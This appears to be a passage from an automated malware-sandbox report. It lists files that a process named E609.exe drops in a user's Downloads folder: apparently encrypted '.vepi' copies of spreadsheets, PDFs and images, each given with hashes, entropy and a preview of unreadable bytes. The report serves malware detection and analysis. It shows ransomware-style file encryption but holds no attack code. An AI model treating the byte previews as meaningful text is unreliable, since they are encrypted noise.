Preview:	DTBZG.M...0..oNv..%.i...\.'. z....S=.....5.Fw......L.;...i.e..wE.}.....}>.....`<..K,....&#..rx:.z.Q^..p...I...v\|......mH......1.G...v...y.@L......#4._>..!...>.!bJ..$.9P.uj....=...r....e.{.Dl..\| ....7'..Gn._.l..$..\|D...`eW;...........e4...Z.Z.......C..r.W..5......S._....q..e.....r.n......J.-.6.TeI.3.J....5cO..KQ.^_t'....j......T.}.~.h.dL1z...P(i'.qZJ..D66!..+...=X..r.\|:-...q...."....,n....PcH....s....q./.4...m...EF..P.VSwA...DH..}T2\...?.bQ.?Y...0..ZW...a...4&PX..@.......!.........S..M.@ZY\....j.T.CC4...9V&....#?9.?......c.GEvgK...d..j."..W..~ZQ.+\|0....hS_q...c...3.c.Y.....Q~.3.....r..8.u.1..F'..`~..X2.@..l.t,2.U...........vV..cu6...mm.`...:..s...-...W...'..(...c..,..b.-..:cm.]M.....A#....E.X.\|...H.j..'.v.@...9.M2v......8.....C.$..}i].;X.....\|.{y&.....1b.6..\|....]N#X.N..7.k.@.0.g.Sg.w..hi..........C..O...h.p.;.vS.4I"'..-.(w.....*..wa.....U>.W.R6.)`a..>..x`!..d..zG..e......vg{...q.v.@..`At......uhPC...........r.G.......!.^ x..>.....K

C:\Users\user\Downloads\DTBZGIOOSO.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856309923375087
Encrypted:	false
SSDEEP:	24:sU2OVV61C+rV7O3+WQGRHMeRSkxOMF1BScPVI2w4zx2/OxowQbD:TNV61Cs54nQGRVRSWFeUVlNx2/VD
MD5:	99931095BCEF62B5CDA118DE02C9EECA
SHA1:	141CFBEFE168F01CA1FBFBF668C01BADEEEB3EEA
SHA-256:	68DA806E93B11F626F9219FCB864448F9693060B3A2D46F82A9C268E68AFB75E
SHA-512:	771061D95636DE9FDCDD3BCA70C63B5D1D47966C7A81EFEA43E33EBB7DA007968611D7DE5402BD149AA177683837854211599E154C4D3617C12F1C7D7642E08B
Malicious:	false
Preview:	DTBZG..].......f...@.....eA.{q]....%...[...y^................D..bT{.....s.u.D......i-n.B.-....j...:B...Ew..s....:..5...I.q..P.X]8a.Q..#......Z..8)..,E...!<.U..N.v..X6......b......k...sN~z...R...Z...@.r2d$......U...F._q.9h6N....o)..x.M..6g.TP...5c..@...9._.L......7k........_m7}..].2W.?.-..K`..R..:..-.zv3G.c.3."T........z..f]?.=..KP.+^....a6.#......[pY#$.u3.f..XF.E/...\X..H9.4.DB.A..t<...j.h.J..]..qY.....5@.D...t.}@.i........ ..M~o.os..8...&.(e...t..e.(.....o.`.F.....s7.a......Lop._>.I.l...'.y...'x....Za6.....YQ.......'..uT.q.}.18..I6..>.WL..T<V...cN...'..n..n...^..&......Ny.8...%..a...^pj..`...!..E.....f.i..5.$STX<..1..BX!.g.,...V.~.q.v.%<<X-...<........#...+8j.I...69/a=.r.H...V.{..:9.a...[......Uk..MX..#..\|...^...mM8.I.T..I....3..........<.!..V..M...Jb...P?......M.Z.$...7Py..y.uU<...........!..t..mt.....7..{&:.._+.q..1x....g...;d....G.....C.!...`..%..a..y.QH2...%........l..X..'C;.e..H....eH..)....S5.8CZ..e0...{D.).....y.A..S.D.

C:\Users\user\Downloads\DTBZGIOOSO.xlsx.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856309923375087
Encrypted:	false
SSDEEP:	24:sU2OVV61C+rV7O3+WQGRHMeRSkxOMF1BScPVI2w4zx2/OxowQbD:TNV61Cs54nQGRVRSWFeUVlNx2/VD
MD5:	99931095BCEF62B5CDA118DE02C9EECA
SHA1:	141CFBEFE168F01CA1FBFBF668C01BADEEEB3EEA
SHA-256:	68DA806E93B11F626F9219FCB864448F9693060B3A2D46F82A9C268E68AFB75E
SHA-512:	771061D95636DE9FDCDD3BCA70C63B5D1D47966C7A81EFEA43E33EBB7DA007968611D7DE5402BD149AA177683837854211599E154C4D3617C12F1C7D7642E08B
Malicious:	false
Preview:	DTBZG..].......f...@.....eA.{q]....%...[...y^................D..bT{.....s.u.D......i-n.B.-....j...:B...Ew..s....:..5...I.q..P.X]8a.Q..#......Z..8)..,E...!<.U..N.v..X6......b......k...sN~z...R...Z...@.r2d$......U...F._q.9h6N....o)..x.M..6g.TP...5c..@...9._.L......7k........_m7}..].2W.?.-..K`..R..:..-.zv3G.c.3."T........z..f]?.=..KP.+^....a6.#......[pY#$.u3.f..XF.E/...\X..H9.4.DB.A..t<...j.h.J..]..qY.....5@.D...t.}@.i........ ..M~o.os..8...&.(e...t..e.(.....o.`.F.....s7.a......Lop._>.I.l...'.y...'x....Za6.....YQ.......'..uT.q.}.18..I6..>.WL..T<V...cN...'..n..n...^..&......Ny.8...%..a...^pj..`...!..E.....f.i..5.$STX<..1..BX!.g.,...V.~.q.v.%<<X-...<........#...+8j.I...69/a=.r.H...V.{..:9.a...[......Uk..MX..#..\|...^...mM8.I.T..I....3..........<.!..V..M...Jb...P?......M.Z.$...7Py..y.uU<...........!..t..mt.....7..{&:.._+.q..1x....g...;d....G.....C.!...`..%..a..y.QH2...%........l..X..'C;.e..H....eH..)....S5.8CZ..e0...{D.).....y.A..S.D.

C:\Users\user\Downloads\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.824253509656315
Encrypted:	false
SSDEEP:	24:D8KzuzVUPCF5bIDJMeFsRpIlD2JxQLpQJ+/NB6zGkBzMKkbD:D8CuzVU67bIDOTKPpQJ+1UuD
MD5:	5DDA8D9C6A394F1BD3FE7AD1031BFCC6
SHA1:	922F553F8D1A16CBE9468B7DA0AABEE3484638F5
SHA-256:	87F1BBA474BC95B4043F427C13C700CE43729632982975786231457F0A2F091E
SHA-512:	80A43B535B08E73FFFE9AB568D46F4AF2D5D6D89F21F0D85999AF5C1625399A3B2983888B3865DD656BDC2532615CF18B4BA08DD8201F80DED23F85E9FDE2E5B
Malicious:	false
Preview:	DVWHK...\|.R9.Cy..`.S..Y.+....x.W..j,6[u.F.{.X*..+..=.K.~..}..L ....@{o.bq..h.m.ys.-...M8P.{..9..G...}...$.F.0G..=.pCs%..?Bd..+#Yr..#.h..P.I..\.Q....;g..p..s....s6m[..qo..C..N........,..i.l?h..,.%..s.).j.\.:..P-.).1U?......I/..u._....%..L.r!.)..?l5..!r0%c)(.....>..0....uqN.h.....CIV..y.B..FmY.7r....s.M5...J..;....../...\|,..L..-L.B0.0.@6..6..q'..\|j_7...-.4.e..v!)WP....6.N...}.........b.......:v....2.O..8k<..6X..4...V.F.v~.g..U_%x..`.r.....l. .@\|.c.?..w.HhY.b......O.E.. oG..:.O.L.YX.p.....7B..s.......h@..f.@r..ty.........p...)T..a.Nz.Om.u?.......#.G..I....%.V.....H..n..5.....J....Hk...!......c....w.Xq.d....}).0.........4'$......<.U.Qe...\|.$s..w..v.:.).4f..LG..`7lfL=W.S...,..G...[m...k.......L]......c[.m.H......4k~f....B..y.th<....,X.@...,JUv......4...a..7."....2.@...(.{k..Zo...x....{.u.U..5...'s..k....K...-.@..7.5..I..K....<{#.w..r.#m..T....)..eE..;..H...2.4...4..%..u....@H...y...c..H.....M...V.k..-.Jj].Nv.T.........t..qz...hb...C...5.

C:\Users\user\Downloads\DVWHKMNFNN.pdf.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.824253509656315
Encrypted:	false
SSDEEP:	24:D8KzuzVUPCF5bIDJMeFsRpIlD2JxQLpQJ+/NB6zGkBzMKkbD:D8CuzVU67bIDOTKPpQJ+1UuD
MD5:	5DDA8D9C6A394F1BD3FE7AD1031BFCC6
SHA1:	922F553F8D1A16CBE9468B7DA0AABEE3484638F5
SHA-256:	87F1BBA474BC95B4043F427C13C700CE43729632982975786231457F0A2F091E
SHA-512:	80A43B535B08E73FFFE9AB568D46F4AF2D5D6D89F21F0D85999AF5C1625399A3B2983888B3865DD656BDC2532615CF18B4BA08DD8201F80DED23F85E9FDE2E5B
Malicious:	false
Preview:	DVWHK...\|.R9.Cy..`.S..Y.+....x.W..j,6[u.F.{.X*..+..=.K.~..}..L ....@{o.bq..h.m.ys.-...M8P.{..9..G...}...$.F.0G..=.pCs%..?Bd..+#Yr..#.h..P.I..\.Q....;g..p..s....s6m[..qo..C..N........,..i.l?h..,.%..s.).j.\.:..P-.).1U?......I/..u._....%..L.r!.)..?l5..!r0%c)(.....>..0....uqN.h.....CIV..y.B..FmY.7r....s.M5...J..;....../...\|,..L..-L.B0.0.@6..6..q'..\|j_7...-.4.e..v!)WP....6.N...}.........b.......:v....2.O..8k<..6X..4...V.F.v~.g..U_%x..`.r.....l. .@\|.c.?..w.HhY.b......O.E.. oG..:.O.L.YX.p.....7B..s.......h@..f.@r..ty.........p...)T..a.Nz.Om.u?.......#.G..I....%.V.....H..n..5.....J....Hk...!......c....w.Xq.d....}).0.........4'$......<.U.Qe...\|.$s..w..v.:.).4f..LG..`7lfL=W.S...,..G...[m...k.......L]......c[.m.H......4k~f....B..y.th<....,X.@...,JUv......4...a..7."....2.@...(.{k..Zo...x....{.u.U..5...'s..k....K...-.@..7.5..I..K....<{#.w..r.#m..T....)..eE..;..H...2.4...4..%..u....@H...y...c..H.....M...V.k..-.Jj].Nv.T.........t..qz...hb...C...5.

C:\Users\user\Downloads\HTAGVDFUIE.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846928528895488
Encrypted:	false
SSDEEP:	24:ZaLgabbXDuQQKgC9FnxQkFNxYRDUWyiKnwip/CpKFTnuEdlt8VOenukA/0WmYotO:ZogaP6QsC1ryw7hp/CpYIHuJMpYotwNT
MD5:	8D441B051C093AEF18B15B1E78D67196
SHA1:	9C1727FFE10DB29C03AD0B7F76E4527BFE850865
SHA-256:	72139180FA1C76240C02C4EA6F9458C9802488BE2B61B2AE1DE7AA23145C1905
SHA-512:	AE6AEC22970A6D2C6599C87CAFBA8C971590BB7D244A70011E1660107D4D3DD853A8A822624A51554C6355D68A2B6BC197776E9160A86981F12F1C775822EA92
Malicious:	false
Preview:	HTAGV.y.Y;+%%4EM........t6.._.k;..zP...?..K=....t...zu.>.f..E.~^....n.X.Y.9r.\(.#......^...U.X].T.....k...P.0....<z.....g%......].S..p..8..q]..N.......ms...d..t....Pp......]......H.FJ.....^W..Z...9v.w.h.g.s...)..4..66...>u..Ne....G.....c...4.F.........Y.lCMS.[..i..r...wk.........Y...9..e..(1.w.O..G7....."..7&f..{z..Y..$..rEI..k.>f 0.S...0.J..l[...g.\|+..vMjP...2?..?-Y...qV.1.....y.?oX.................d..98..%Kr.1.TnW.D.G.B..S...s$....=...%.?.LU`.v....r ...[.2.~.....(^..1Q......O...NW.Y...-......g..2....X.....c..U]+..}1....5..+...C.....~./.y.)JGB.......T.Yb....JG.....a.......\ovB.!.....O......:o{p......#.XG....\.;ow...@$...U..r)..Gj9..{.u........C-.=B..^...O...+.4...........~..l..K.o...Ney!.,\v.......l....H]..+S.,....H...z.>...e...[...!.\ym..J.?...)o.5.."H.8:.(.t.u.{.Y....u.\.b...+...Z.n..+..t.<.-......^.N.....Gwb..(.@.ls..,...g:....c...QY1t{.".xY..$.m?$..P`M.c....!.G...]..J.....]...p\..^U.T.....a3.v.<.......u..&.o..C.g2on\.{..v.

C:\Users\user\Downloads\HTAGVDFUIE.jpg.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846928528895488
Encrypted:	false
SSDEEP:	24:ZaLgabbXDuQQKgC9FnxQkFNxYRDUWyiKnwip/CpKFTnuEdlt8VOenukA/0WmYotO:ZogaP6QsC1ryw7hp/CpYIHuJMpYotwNT
MD5:	8D441B051C093AEF18B15B1E78D67196
SHA1:	9C1727FFE10DB29C03AD0B7F76E4527BFE850865
SHA-256:	72139180FA1C76240C02C4EA6F9458C9802488BE2B61B2AE1DE7AA23145C1905
SHA-512:	AE6AEC22970A6D2C6599C87CAFBA8C971590BB7D244A70011E1660107D4D3DD853A8A822624A51554C6355D68A2B6BC197776E9160A86981F12F1C775822EA92
Malicious:	false
Preview:	HTAGV.y.Y;+%%4EM........t6.._.k;..zP...?..K=....t...zu.>.f..E.~^....n.X.Y.9r.\(.#......^...U.X].T.....k...P.0....<z.....g%......].S..p..8..q]..N.......ms...d..t....Pp......]......H.FJ.....^W..Z...9v.w.h.g.s...)..4..66...>u..Ne....G.....c...4.F.........Y.lCMS.[..i..r...wk.........Y...9..e..(1.w.O..G7....."..7&f..{z..Y..$..rEI..k.>f 0.S...0.J..l[...g.\|+..vMjP...2?..?-Y...qV.1.....y.?oX.................d..98..%Kr.1.TnW.D.G.B..S...s$....=...%.?.LU`.v....r ...[.2.~.....(^..1Q......O...NW.Y...-......g..2....X.....c..U]+..}1....5..+...C.....~./.y.)JGB.......T.Yb....JG.....a.......\ovB.!.....O......:o{p......#.XG....\.;ow...@$...U..r)..Gj9..{.u........C-.=B..^...O...+.4...........~..l..K.o...Ney!.,\v.......l....H]..+S.,....H...z.>...e...[...!.\ym..J.?...)o.5.."H.8:.(.t.u.{.Y....u.\.b...+...Z.n..+..t.<.-......^.N.....Gwb..(.@.ls..,...g:....c...QY1t{.".xY..$.m?$..P`M.c....!.G...]..J.....]...p\..^U.T.....a3.v.<.......u..&.o..C.g2on\.{..v.

C:\Users\user\Downloads\JSDNGYCOWY.png

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848447930733088
Encrypted:	false
SSDEEP:	24:IGoGcp2hFP/0x+HAhOlfQkNKf+Mwg6uOIUTencvAPq0pNS9TcBobD:I/VsX2+HNlfQ9r6uOIUy4UpNAcByD
MD5:	70595343B902F63AFEF1E55DD09EE75D
SHA1:	5D5901ECDB29F205F1BE8C189BDD53D932823F3F
SHA-256:	00232298DAF2ACB4E88CF2662B033BDFB569823AAA67184BF92E8F6DA73BA2DC
SHA-512:	C3ACC48CEA7F8465B10C6A79264B0E30485AD0B5156A4626291CD2FCF2207CE47EC48BA5855314888D3D49FF8D181F65D74056FFF505F9AEFC1AF2B8A34604ED
Malicious:	false
Preview:	JSDNG?...h...i .....1!)..9njc.y..R.L8B#.....5Y..5n.}........$w...GMn.R...@...&.#l...L....8.b.!..alh....x...9...z.....9.N.[.r.].S;.Ov...C1..\|{.A..)R......t.5U+D.. {\|..6B.0D.!....q.>iA"..)J$..x~..\|.......:..J.....X.x}..t..2.\sS.......M..F....~..Y\|....+...)d@&.....a:n.%s(5Q[.......jO7...3&.=...?\5....=.rA....U.y&x.............v}O...g.Q.g..@AT9N.....Uhn.s[..........6.EA.U._.....4M......#'G....ZJ.../..m.8...wW9....<Q.x..l.K...KD...E#.9.f...y.m...F....N....W......c...H$y#.H[g.Gi.:&..=.SP0^..-=...`...p.....nU.)>............,.3.........&.....Q...c..P.....e....#..K.tG....1.C..v.....G..(.F.L G.....u..+.Mp...y...# aZ.....A...e...l...}&....a.-H.ik.sH..s.M...lO.....c.p.....sLMB.N...N.5........[..!..V..8..h.0F.fA.-..V?Q}....~N......&6[..*{...)..05T.N\.....,E...xw.`..8....X....J......A..`..].YS......@.../.\|?.r......P..e.S%FT...`UR..3.rh..y..A!....I$$...).h.y...U.....R....i..4...C........(.^.!..~..i,8..U..:..v.]#U.....i.24.Y..).3tHj....{._...Y......

C:\Users\user\Downloads\JSDNGYCOWY.png.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848447930733088
Encrypted:	false
SSDEEP:	24:IGoGcp2hFP/0x+HAhOlfQkNKf+Mwg6uOIUTencvAPq0pNS9TcBobD:I/VsX2+HNlfQ9r6uOIUy4UpNAcByD
MD5:	70595343B902F63AFEF1E55DD09EE75D
SHA1:	5D5901ECDB29F205F1BE8C189BDD53D932823F3F
SHA-256:	00232298DAF2ACB4E88CF2662B033BDFB569823AAA67184BF92E8F6DA73BA2DC
SHA-512:	C3ACC48CEA7F8465B10C6A79264B0E30485AD0B5156A4626291CD2FCF2207CE47EC48BA5855314888D3D49FF8D181F65D74056FFF505F9AEFC1AF2B8A34604ED
Malicious:	false
Preview:	JSDNG?...h...i .....1!)..9njc.y..R.L8B#.....5Y..5n.}........$w...GMn.R...@...&.#l...L....8.b.!..alh....x...9...z.....9.N.[.r.].S;.Ov...C1..\|{.A..)R......t.5U+D.. {\|..6B.0D.!....q.>iA"..)J$..x~..\|.......:..J.....X.x}..t..2.\sS.......M..F....~..Y\|....+...)d@&.....a:n.%s(5Q[.......jO7...3&.=...?\5....=.rA....U.y&x.............v}O...g.Q.g..@AT9N.....Uhn.s[..........6.EA.U._.....4M......#'G....ZJ.../..m.8...wW9....<Q.x..l.K...KD...E#.9.f...y.m...F....N....W......c...H$y#.H[g.Gi.:&..=.SP0^..-=...`...p.....nU.)>............,.3.........&.....Q...c..P.....e....#..K.tG....1.C..v.....G..(.F.L G.....u..+.Mp...y...# aZ.....A...e...l...}&....a.-H.ik.sH..s.M...lO.....c.p.....sLMB.N...N.5........[..!..V..8..h.0F.fA.-..V?Q}....~N......&6[..*{...)..05T.N\.....,E...xw.`..8....X....J......A..`..].YS......@.../.\|?.r......P..e.S%FT...`UR..3.rh..y..A!....I$$...).h.y...U.....R....i..4...C........(.^.!..~..i,8..U..:..v.]#U.....i.24.Y..).3tHj....{._...Y......

C:\Users\user\Downloads\LTKMYBSEYZ.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846371906333917
Encrypted:	false
SSDEEP:	24:EMcjsyNRoqZSj+n/oErG6Lcxrc+PKx5xD+c8ZVIYymzRZnwZ5z/1ISW4HHSJAfbD:ZGKqsj+/om9LcJPi5xD+c2VIAzRZnwvN
MD5:	538EBB3F22F376D35E2964BF5C4A3B4C
SHA1:	D34B015DE3CA1E54050FE0AB037DF3879BE4B062
SHA-256:	F935E88ACBA4B155C2B61FC62E5D42D3B053F7F93AA8F34D37226EA636927EBD
SHA-512:	A06D72832667A706E89206B706D28716394562D21B298CB71CFA67B166FEB2EC2B77DBC80FAEBD1ABB64A5B9360C89C69E46C777C2834E839C397E1E8E566E29
Malicious:	false
Preview:	LTKMYh....F...cbj....>........W.n....i.!k.p5.....U...`I.v....%..a..h.~........7D...........7.1z6......I.....9.>/Q&...OF.m.CE..M..d...R[....{.. .S=..E......,sKJ..........z...J.qR....P......,..u....m..%l..L..../GRt...<px...E..O.luR=;.\....t.M.@'C&.+...>....C......4...&..J'.uU.%....,{C.Q\|..\|A. .. ...Z..vuf..I.U.l.Y:..h)....3.....a.I..~/7.$.....$[.d.Q.q...I-#."m..'0\YN...../.1.o....d...Ccj.p.q....^...&.-.. .......HM6...L.A<6C.8K..oEP(..r......Z..%....c.c.`4.^..3.....PV.$.....5."....@+l...3..>].....5......R..QQD..;..u....[..:.....,9U)Dh.._T....i.q..O...._..3...f....b. ...A..]'.Q....F.%)C..2..I..e..)v....d..H..2....cEV..s..HW...j}S...i..\|.m..B....t...A..w..h..\...Y[x@t.....w....Ru..d.K.lw...-2y...O.\...._.....n..~.......[.'....r....W.v...R.....@...]..OL..i..H..^...H.k...D7f.I...2.,j.>.lY>:V..<....T...E.IP\|_,.o .....<.!..I..'.:.-....c.Y. .V.qa..&....V.&.....J....v.z..p.H.....G..r.#....`!r.3...B.....$\|........72.....T.W......Q.........."d{....

C:\Users\user\Downloads\LTKMYBSEYZ.png.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846371906333917
Encrypted:	false
SSDEEP:	24:EMcjsyNRoqZSj+n/oErG6Lcxrc+PKx5xD+c8ZVIYymzRZnwZ5z/1ISW4HHSJAfbD:ZGKqsj+/om9LcJPi5xD+c2VIAzRZnwvN
MD5:	538EBB3F22F376D35E2964BF5C4A3B4C
SHA1:	D34B015DE3CA1E54050FE0AB037DF3879BE4B062
SHA-256:	F935E88ACBA4B155C2B61FC62E5D42D3B053F7F93AA8F34D37226EA636927EBD
SHA-512:	A06D72832667A706E89206B706D28716394562D21B298CB71CFA67B166FEB2EC2B77DBC80FAEBD1ABB64A5B9360C89C69E46C777C2834E839C397E1E8E566E29
Malicious:	false
Preview:	LTKMYh....F...cbj....>........W.n....i.!k.p5.....U...`I.v....%..a..h.~........7D...........7.1z6......I.....9.>/Q&...OF.m.CE..M..d...R[....{.. .S=..E......,sKJ..........z...J.qR....P......,..u....m..%l..L..../GRt...<px...E..O.luR=;.\....t.M.@'C&.+...>....C......4...&..J'.uU.%....,{C.Q\|..\|A. .. ...Z..vuf..I.U.l.Y:..h)....3.....a.I..~/7.$.....$[.d.Q.q...I-#."m..'0\YN...../.1.o....d...Ccj.p.q....^...&.-.. .......HM6...L.A<6C.8K..oEP(..r......Z..%....c.c.`4.^..3.....PV.$.....5."....@+l...3..>].....5......R..QQD..;..u....[..:.....,9U)Dh.._T....i.q..O...._..3...f....b. ...A..]'.Q....F.%)C..2..I..e..)v....d..H..2....cEV..s..HW...j}S...i..\|.m..B....t...A..w..h..\...Y[x@t.....w....Ru..d.K.lw...-2y...O.\...._.....n..~.......[.'....r....W.v...R.....@...]..OL..i..H..^...H.k...D7f.I...2.,j.>.lY>:V..<....T...E.IP\|_,.o .....<.!..I..'.:.-....c.Y. .V.qa..&....V.&.....J....v.z..p.H.....G..r.#....`!r.3...B.....$\|........72.....T.W......Q.........."d{....

C:\Users\user\Downloads\ONBQCLYSPU.jpg

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850099290001708
Encrypted:	false
SSDEEP:	24:hA6wxHOi+vCeghGCuFGe3IMT9IqLthkrzv1xeKdT9iTylkgLhThE2EsB2gkJbD:hARxui+1ghGC6IMTfLfbCT9qwFT5EsBs
MD5:	F88FCFDF9DF36072470F52FC41D93145
SHA1:	43C8D4F4B5818C2033958381AF294BFD41CB177A
SHA-256:	35E62E577895C5317E9CA287EE8E00249D683B0A7B084B701B768EBDCCA30FFC
SHA-512:	7F7AF81A368B4D3A820657B32E21CDDCF0AAF7C13CB3373607F3BBC30DC6666DC3D102122ED3DD2D111371B8DD1BAA9A6B0B7E81C7747F242D4B47BA60BDDE92
Malicious:	false
Preview:	ONBQC..`..J...l...i..vDP.-CUc(i.G....t`..V.-"Z.Cw;..^.lL..C.f7Y<86.......iN.m..@.[E9....y.@._......o.$>.....H.... ......l..0i..K.>......v..nZ...v.k..j.h!..5 z.2rP.Q.U....&=.....C.5i.yP..#IC.......CjC.Y.9.e.,...P.....U.Y$.!.....b.B.U.!6(.pd...E.C..........5. ...7....~....[-..>..:D,1.V.dy.9.mr\..V)N.......o(,^m............Dn.p.A\]..@f...N.ES...c}.^1=&.....Z.3.X{.../+B..i'......;.v.y..;Aq.J...?.+.\`.G...i.....F..t...pd..,5...D.t...qD.....s7...G.U.m...V.p9U.a.6.....{."1.D.....p-.Q/.7.6gdQ.t.....9HC.`?uNG..o...y[bC..}..7..r..Ug.}t... ..`..o.K0.U....6=(9..j1....<2..C.n4=.\[,.y...+./..t.<....ZT...i,4....P[W.p.9@..L.s...?5s.)k.....iY.6.X.\|...m.&.0...{t-....S...:....\..X..ug.kU.t.C=L..b,d..,D.eR[...E2..,..!5......N:.8j. ...RGz......>,`s ...$h........s=M...>...Xp<G.Q.,..@..a..zP.U.f.Z.o4P..#....>.S.EA"........s.2..T.ht.E$.+..#..w..W&..@.'ue.f.K..@N...==.wr.Ji.-....h.0.7o....[.*F..wf....TX^.9.4Jm.I7m...V.HnEQ..-.._. j.)....>jg..g..B.i.O...

C:\Users\user\Downloads\ONBQCLYSPU.jpg.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850099290001708
Encrypted:	false
SSDEEP:	24:hA6wxHOi+vCeghGCuFGe3IMT9IqLthkrzv1xeKdT9iTylkgLhThE2EsB2gkJbD:hARxui+1ghGC6IMTfLfbCT9qwFT5EsBs
MD5:	F88FCFDF9DF36072470F52FC41D93145
SHA1:	43C8D4F4B5818C2033958381AF294BFD41CB177A
SHA-256:	35E62E577895C5317E9CA287EE8E00249D683B0A7B084B701B768EBDCCA30FFC
SHA-512:	7F7AF81A368B4D3A820657B32E21CDDCF0AAF7C13CB3373607F3BBC30DC6666DC3D102122ED3DD2D111371B8DD1BAA9A6B0B7E81C7747F242D4B47BA60BDDE92
Malicious:	false
Preview:	ONBQC..`..J...l...i..vDP.-CUc(i.G....t`..V.-"Z.Cw;..^.lL..C.f7Y<86.......iN.m..@.[E9....y.@._......o.$>.....H.... ......l..0i..K.>......v..nZ...v.k..j.h!..5 z.2rP.Q.U....&=.....C.5i.yP..#IC.......CjC.Y.9.e.,...P.....U.Y$.!.....b.B.U.!6(.pd...E.C..........5. ...7....~....[-..>..:D,1.V.dy.9.mr\..V)N.......o(,^m............Dn.p.A\]..@f...N.ES...c}.^1=&.....Z.3.X{.../+B..i'......;.v.y..;Aq.J...?.+.\`.G...i.....F..t...pd..,5...D.t...qD.....s7...G.U.m...V.p9U.a.6.....{."1.D.....p-.Q/.7.6gdQ.t.....9HC.`?uNG..o...y[bC..}..7..r..Ug.}t... ..`..o.K0.U....6=(9..j1....<2..C.n4=.\[,.y...+./..t.<....ZT...i,4....P[W.p.9@..L.s...?5s.)k.....iY.6.X.\|...m.&.0...{t-....S...:....\..X..ug.kU.t.C=L..b,d..,D.eR[...E2..,..!5......N:.8j. ...RGz......>,`s ...$h........s=M...>...Xp<G.Q.,..@..a..zP.U.f.Z.o4P..#....>.S.EA"........s.2..T.ht.E$.+..#..w..W&..@.'ue.f.K..@N...==.wr.Ji.-....h.0.7o....[.*F..wf....TX^.9.4Jm.I7m...V.HnEQ..-.._. j.)....>jg..g..B.i.O...

C:\Users\user\Downloads\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852695106672427
Encrypted:	false
SSDEEP:	24:WvM2k4/q2/GfNliI2FPa2xp43vaihjEG64GfiwrBoYiNK1Z4SxlE/WQsbD:odcf6P7MjEGXwrBoYLwSzuWhD
MD5:	61DFFD60FF5A90E3B909471376CE42C5
SHA1:	8EEA71CC62004852064A0CB763704C9CED18C1EE
SHA-256:	F6A6E4A6C2B733EDC5C38AC8A6193465FA5C0A9C5A1282C533549F4115F4F70F
SHA-512:	7785AAF0F1445E3E0567FD4E8ED26606419E87BE8BD4C43B3D0606805F929AE2389DE6E5BC1D3BFC1BDE8C2DE287151CB7D5FFB8B43F995EA8BCE1303C374281
Malicious:	false
Preview:	ONBQC..-../(.8.......Yu..M...;......M.t1.z.J.1.[...T.G..<@u.3...Pl.:.\%Z<)T....\.,...:....~>.....=&...U.#.7.... AG...ITJX.....ni...gj.!<0.a.+1.5\|..)..V..`..m.&....b_."~.]:...... N..z.-...^.......TZ..[.....`G.H7$..O).o...d.w..$..;......&cq5..G.n..&...P.....)..n.o.{.F...;..X.g.C.^......D ~W....)..E.RfC.~."+#.\|..x...M{..".Hupe..9t..S.....:)..4`!._.+E.r...!....+u.....\|..w...:&..8...TW..L}........d=&.......%Q..;?...+.U.<.T\N....^.T.....e.........h.5.a.p..W..~sH..-..D9.......W.(.,8..A...T)~.@..E.3AR...1...gf..:`...ha..q..(.........A.\..R....5$...1.J.-O.xS..E...W.u..JW'...O..O..p....u.xs.8P.?.@m.....&...}i..y.z5..7v.`..wA..a..$V.@..B. ..R.is......V:z.l.;.....E......X....(.8%(M.. .;wh.)t..P...3.Uw..el.<.6]...A......:O.x......x....q{.o.H].`....q@.;..F..Qs[r..H.;."z&.:.\0.{$.,.FG.O....MZ.d..hm....$..i.ov..k.T....fC;-?......G.unXN}P.....:)...........Cx.Z;B...p...?`..L^..U.pi!..;KA]....Z`-.14......S.....[..y.Y7..............DC...xh.

C:\Users\user\Downloads\ONBQCLYSPU.xlsx.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852695106672427
Encrypted:	false
SSDEEP:	24:WvM2k4/q2/GfNliI2FPa2xp43vaihjEG64GfiwrBoYiNK1Z4SxlE/WQsbD:odcf6P7MjEGXwrBoYLwSzuWhD
MD5:	61DFFD60FF5A90E3B909471376CE42C5
SHA1:	8EEA71CC62004852064A0CB763704C9CED18C1EE
SHA-256:	F6A6E4A6C2B733EDC5C38AC8A6193465FA5C0A9C5A1282C533549F4115F4F70F
SHA-512:	7785AAF0F1445E3E0567FD4E8ED26606419E87BE8BD4C43B3D0606805F929AE2389DE6E5BC1D3BFC1BDE8C2DE287151CB7D5FFB8B43F995EA8BCE1303C374281
Malicious:	false
